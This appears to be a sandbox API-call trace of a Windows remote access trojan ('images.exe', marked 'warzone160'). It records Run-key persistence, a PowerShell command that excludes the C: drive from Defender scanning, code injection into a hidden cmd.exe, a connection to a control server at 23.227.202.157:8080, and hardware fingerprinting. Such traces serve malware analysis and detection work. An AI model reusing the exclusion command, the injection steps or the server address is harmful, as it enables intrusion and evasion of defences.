lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="L15UQINRPS" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS" [0298.781] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.781] lstrlenW (lpString="inst") returned 4 [0298.781] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.782] lstrlenW (lpString="inst") returned 4 [0298.782] lstrcpyW (in: lpString1=0x3690000, lpString2="inst" | out: lpString1="inst") returned="inst" [0298.782] lstrlenW (lpString="inst") returned 4 [0298.782] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0298.782] lstrcpyW (in: lpString1=0x36a0000, lpString2="inst" | out: lpString1="inst") returned="inst" [0298.782] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.825] lstrlenW (lpString="InitWindows") returned 11 [0298.825] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.825] lstrlenW (lpString="InitWindows") returned 11 [0298.825] lstrcpyW (in: lpString1=0x3690000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0298.825] lstrlenW (lpString="InitWindows") returned 11 [0298.825] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x36c0000 [0298.825] lstrcpyW (in: lpString1=0x36c0000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0298.825] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.826] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0298.826] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.826] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0298.826] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0298.826] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0298.826] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x36d0000 [0298.827] lstrcpyW (in: lpString1=0x36d0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0298.827] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2c8f950 | out: phkResult=0x2c8f950*=0x294) returned 0x0 [0298.827] RegQueryValueExW (in: hKey=0x294, lpValueName="inst", lpReserved=0x0, lpType=0x2c8f888, lpData=0x0, lpcbData=0x2c8f88c*=0x0 | out: lpType=0x2c8f888*=0x0, lpData=0x0, lpcbData=0x2c8f88c*=0x0) returned 0x2 [0298.827] GetProcessHeap () returned 0x650000 [0298.827] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7d0) returned 0x6af618 [0298.827] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6af618, nSize=0x3e8 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0298.827] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0298.828] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.828] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0298.828] lstrcpyW (in: lpString1=0x3690000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0298.828] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0298.828] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0298.828] lstrcpyW (in: lpString1=0x36e0000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0298.828] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.829] GetProcessHeap () returned 0x650000 [0298.829] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6af618 | out: hHeap=0x650000) returned 1 [0298.829] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0298.829] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0298.831] lstrcpyW (in: lpString1=0x3690000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0298.831] VirtualFree (lpAddress=0x36e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.832] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0298.832] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x298 [0298.832] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2c8fd1c | out: lpWSAData=0x2c8fd1c) returned 0 [0298.832] GetProcessHeap () returned 0x650000 [0298.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x32) returned 0x65e750 [0298.832] lstrlenW (lpString="23.227.202.157") returned 14 [0298.832] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0298.833] lstrcpyW (in: lpString1=0x36f0000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0298.833] lstrlenW (lpString="images.exe") returned 10 [0298.833] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3700000 [0298.833] lstrcpyW (in: lpString1=0x3700000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0298.833] lstrlenW (lpString="Images") returned 6 [0298.833] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3710000 [0298.833] lstrcpyW (in: lpString1=0x3710000, lpString2="Images" | out: lpString1="Images") returned="Images" [0298.833] lstrlenW (lpString="L15UQINRPS") returned 10 [0298.833] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3720000 [0298.834] lstrcpyW (in: lpString1=0x3720000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0298.834] GetProcessHeap () returned 0x650000 [0298.834] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x200) returned 0x6af618 [0298.834] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0298.834] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2c8fad8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0298.838] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0298.838] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0298.838] GetCurrentProcess () returned 0xffffffff [0298.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2c8f8c4 | out: TokenHandle=0x2c8f8c4*=0x2ac) returned 1 [0298.838] GetTokenInformation (in: TokenHandle=0x2ac, TokenInformationClass=0x14, TokenInformation=0x2c8f8bc, TokenInformationLength=0x4, ReturnLength=0x2c8f8c0 | out: TokenInformation=0x2c8f8bc, ReturnLength=0x2c8f8c0) returned 1 [0298.838] CloseHandle (hObject=0x2ac) returned 1 [0298.838] GetCurrentProcess () returned 0xffffffff [0298.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2c8f8c4 | out: TokenHandle=0x2c8f8c4*=0x2ac) returned 1 [0298.838] GetTokenInformation (in: TokenHandle=0x2ac, TokenInformationClass=0x14, TokenInformation=0x2c8f8bc, TokenInformationLength=0x4, ReturnLength=0x2c8f8c0 | out: TokenInformation=0x2c8f8bc, ReturnLength=0x2c8f8c0) returned 1 [0298.838] CloseHandle (hObject=0x2ac) returned 1 [0298.838] GetProcessHeap () returned 0x650000 [0298.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100) returned 0x6af988 [0298.838] GetProcessHeap () returned 0x650000 [0298.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100) returned 0x6afa90 [0298.838] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6af988, nSize=0x100 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0298.838] WinExec (lpCmdLine="powershell Add-MpPreference -ExclusionPath C:\\", uCmdShow=0x0) returned 0x21 [0298.862] GetCurrentProcess () returned 0xffffffff [0298.862] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2c8f8c4 | out: Wow64Process=0x2c8f8c4*=1) returned 1 [0298.862] VirtualAlloc (lpAddress=0x0, dwSize=0xff, flAllocationType=0x1000, flProtect=0x40) returned 0x3750000 [0298.862] GetWindowsDirectoryA (in: lpBuffer=0x3750000, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0298.862] lstrlenA (lpString="C:\\Windows") returned 10 [0298.863] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2c8f868*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2c8f8b4 | out: lpCommandLine=0x0, lpProcessInformation=0x2c8f8b4*(hProcess=0x2a0, hThread=0x2ac, dwProcessId=0x6f4, dwThreadId=0x9a8)) returned 1 [0299.472] Sleep (dwMilliseconds=0x3e8) [0300.597] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6f4) returned 0x2a4 [0300.597] GetCurrentProcessId () returned 0xfb8 [0300.597] GetProcessHeap () returned 0x650000 [0300.597] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xff) returned 0x6afb98 [0300.597] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6afb98, nSize=0xff | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0300.597] VirtualAllocEx (hProcess=0x2a4, lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0300.598] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x20000, lpBuffer=0x2a09158*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2a09158*, lpNumberOfBytesWritten=0x0) returned 1 [0300.600] VirtualProtectEx (in: hProcess=0x2a4, lpAddress=0x20000, dwSize=0x800, flNewProtect=0x40, lpflOldProtect=0x2c8f848 | out: lpflOldProtect=0x2c8f848*=0x40) returned 1 [0300.639] VirtualAllocEx (hProcess=0x2a4, lpAddress=0x0, dwSize=0x103, flAllocationType=0x3000, flProtect=0x4) returned 0x30000 [0300.639] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x30000, lpBuffer=0x2c8f744*, nSize=0x103, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2c8f744*, lpNumberOfBytesWritten=0x0) returned 1 [0300.640] CreateRemoteThread (in: hProcess=0x2a4, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2010e, lpParameter=0x30000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b0 [0300.777] lstrlenW (lpString="23.227.202.157") returned 14 [0300.777] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0300.778] lstrcpyW (in: lpString1=0x3760000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0300.778] lstrlenW (lpString="23.227.202.157") returned 14 [0300.778] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0300.779] lstrcpyW (in: lpString1=0x3770000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0300.779] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0300.779] lstrlenW (lpString="23.227.202.157") returned 14 [0300.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="23.227.202.157", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0300.783] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0300.783] lstrlenW (lpString="23.227.202.157") returned 14 [0300.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="23.227.202.157", cchWideChar=14, lpMultiByteStr=0x3790000, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="23.227.202.157", lpUsedDefaultChar=0x0) returned 14 [0300.785] lstrlenA (lpString="23.227.202.157") returned 14 [0300.785] lstrlenA (lpString="23.227.202.157") returned 14 [0300.785] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x37a0000 [0300.786] lstrcpyA (in: lpString1=0x37a0000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0300.786] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0300.787] lstrlenA (lpString="23.227.202.157") returned 14 [0300.787] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0300.788] lstrcatA (in: lpString1="", lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0300.788] VirtualFree (lpAddress=0x37a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0300.789] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0300.790] VirtualFree (lpAddress=0x36e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0300.790] lstrlenA (lpString="23.227.202.157") returned 14 [0300.790] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0300.791] lstrcatA (in: lpString1="", lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0300.791] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0xffffffff) returned 0x0 [0300.793] getaddrinfo (in: pNodeName="23.227.202.157", pServiceName=0x0, pHints=0x2c8f874*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x2c8f894 | out: ppResult=0x2c8f894*=0x66e398*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x670050*(sa_family=2, sin_port=0x0, sin_addr="23.227.202.157"), ai_next=0x0)) returned 0 [0300.795] socket (af=2, type=1, protocol=0) returned 0x2c0 [0301.655] htons (hostshort=0x1f90) returned 0x901f [0301.655] FreeAddrInfoW (pAddrInfo=0x66e398*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x670050*(sa_family=2, sin_port=0x0, sin_addr="23.227.202.157"), ai_next=0x0)) [0301.655] connect (s=0x2c0, name=0x2c8feac*(sa_family=2, sin_port=0x1f90, sin_addr="23.227.202.157"), namelen=16) returned 0 [0301.788] ReleaseMutex (hMutex=0x298) returned 1 [0301.788] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0301.789] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0301.790] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0301.793] setsockopt (s=0x2c0, level=65535, optname=4102, optval="`ê", optlen=4) returned 0 [0301.793] lstrlenA (lpString="warzone160") returned 10 [0301.793] lstrlenA (lpString="warzone160") returned 10 [0301.793] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0301.793] lstrcpyA (in: lpString1=0x3760000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0301.793] lstrlenA (lpString="warzone160") returned 10 [0301.793] GetProcessHeap () returned 0x650000 [0301.793] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x66ff78 [0301.793] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0301.794] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0302.429] GetProcessHeap () returned 0x650000 [0302.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x670050 [0302.429] GetProcessHeap () returned 0x650000 [0302.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66fea0 [0302.429] GetProcessHeap () returned 0x650000 [0302.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x66fe70 [0302.429] GetProcessHeap () returned 0x650000 [0302.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66ff00 [0302.429] GetProcessHeap () returned 0x650000 [0302.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66ffd8 [0302.429] GetProcessHeap () returned 0x650000 [0302.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66ff00 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fe70 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fea0 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66ffd8 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x670050 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66fed0 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x670080 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x66fea0 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66fe70 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66fee8 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fe70 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fea0 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x670080 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x66ff18 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fed0 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66fee8 | out: hHeap=0x650000) returned 1 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x0) returned 0x669330 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6692b0 [0302.430] GetProcessHeap () returned 0x650000 [0302.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x200) returned 0x6a99b0 [0302.431] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.431] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.431] VirtualAlloc (lpAddress=0x0, dwSize=0x27, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0302.431] lstrcpyA (in: lpString1=0x3760000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0302.431] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.431] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x3760000, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0302.431] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0302.432] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.432] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3760000, cbMultiByte=-1, lpWideCharStr=0x3770000, cchWideChar=82 | out: lpWideCharStr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 40 [0302.432] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.432] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0302.432] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.432] lstrcpyW (in: lpString1=0x3780000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0302.432] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0302.432] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0302.432] lstrcpyW (in: lpString1=0x3790000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0302.432] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0302.433] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0302.434] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0302.434] GetProcessHeap () returned 0x650000 [0302.435] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a99b0 | out: hHeap=0x650000) returned 1 [0302.435] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0302.499] CoInitialize (pvReserved=0x0) returned 0x1 [0302.499] CoCreateInstance (in: rclsid=0x2a04490*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x2a06e60*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x2c7f484 | out: ppv=0x2c7f484*=0x669340) returned 0x0 [0303.443] WbemLocator:IWbemLocator:ConnectServer (in: This=0x669340, strNetworkResource="root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x2c7f478 | out: ppNamespace=0x2c7f478*=0x67c6d0) returned 0x0 [0307.353] IWbemServices:ExecQuery (in: This=0x67c6d0, strQueryLanguage="", strQuery="", lFlags=32, pCtx=0x0, ppEnum=0x2c7f47c | out: ppEnum=0x2c7f47c*=0x680868) returned 0x0 [0310.534] IEnumWbemClassObject:Next (in: This=0x680868, lTimeout=-1, uCount=0x1, apObjects=0x2c7f480, puReturned=0x2c7f474 | out: apObjects=0x2c7f480*=0x681e30, puReturned=0x2c7f474*=0x1) returned 0x0 [0310.991] IWbemClassObject:Get (in: This=0x681e30, wszName="Name", lFlags=0, pVal=0x2c7f460*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2c7f460*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) HD Graphics 630", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0310.992] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0310.992] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0310.994] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0310.994] lstrcpyW (in: lpString1=0x3760000, lpString2="Intel(R) HD Graphics 630" | out: lpString1="Intel(R) HD Graphics 630") returned="Intel(R) HD Graphics 630" [0310.995] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2c7f6a8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0310.995] GetProcessHeap () returned 0x650000 [0310.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x400000) returned 0x3ca9020 [0311.048] CreateFileA (lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0311.048] GetFileSize (in: hFile=0x354, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36600 [0311.048] ReadFile (in: hFile=0x354, lpBuffer=0x3ca9020, nNumberOfBytesToRead=0x36600, lpNumberOfBytesRead=0x2c7f484, lpOverlapped=0x0 | out: lpBuffer=0x3ca9020*, lpNumberOfBytesRead=0x2c7f484*=0x36600, lpOverlapped=0x0) returned 1 [0311.053] CloseHandle (hObject=0x354) returned 1 [0311.053] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0311.053] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 